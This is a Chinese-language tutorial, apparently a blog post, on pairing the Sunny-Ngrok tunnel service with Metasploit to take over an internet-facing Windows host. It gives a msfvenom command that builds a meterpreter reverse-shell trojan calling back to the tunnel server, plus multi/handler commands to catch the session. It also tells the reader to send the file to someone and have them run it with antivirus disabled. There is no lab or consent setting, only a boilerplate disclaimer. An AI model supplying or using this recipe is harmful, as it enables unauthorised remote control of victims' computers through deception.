免责声明：本文内容仅供参考，不构成任何建议或承诺。读者因使用本文信息而产生的任何后果，责任自负

实现原理：

Sunny-Ngrok是一种内网穿透工具，能够将本地服务映射到公网，而MSF（Metasploit Framework）是渗透测试框架，常用于漏洞利用与后门控制。结合使用时，Sunny-Ngrok提供公网访问入口，MSF通过该隧道建立反向连接

反向shell基本概念：

反向Shell（Reverse Shell）是一种网络攻击技术，目标主机主动连接到攻击者的机器，从而建立一个远程控制会话。与传统的正向Shell（攻击者连接目标）不同，反向Shell常用于绕过防火墙或NAT限制

一.实现Sunny-Ngrok的隧道穿透技术

1.登录Sunny-Ngrok官网，注册并登录。

花费2元进行实名认证：

通过 隧道管理开通并创建隧道,suuny-ngrok使用教程：Sunny-Ngrok使用教程 · Sunny-Ngrok说明文档

选择开通隧道，找到免费的服务器，立即购买。

创建隧道

创建成功

下载对应客户端linux版本：

下载好的文件解压后放到kali桌面，进入  /桌面/linux_amd64 ,查看目录有没有sunny这个文件

在这个目录执行   sudo ./sunny --server=服务器地址:服务器端口 --key=隧道id   命令启动并使用上面创建的隧道

出现这个就成功启动隧道了，（不需要访问网址）

二.kali隧道穿透实现MSF攻击外网主机

使用sudo su root进入root模式

用msfvenom生成一个简单的木马（反向shell）：msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=服务器地址 lport=隧道端口 -f exe -o /home/kali/桌面/nihao.exe

注：服务器地址不能包含tcp://,隧道端口和服务器端口是两个不一样的含义

把生成的木马发个别人并让他运行

注：请关闭杀毒软件，否则杀毒软件会自动删除。

使用msfconsole启动metasploit

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.1.6
msf6 exploit(multi/handler) > set lport 8001
msf6 exploit(multi/handler) > run
lhost 填你的kali的ip （192.168.1.6）
lport 填本地端口（8001）

成功了，可以通过shell获取到对方的操作系统的命令行界面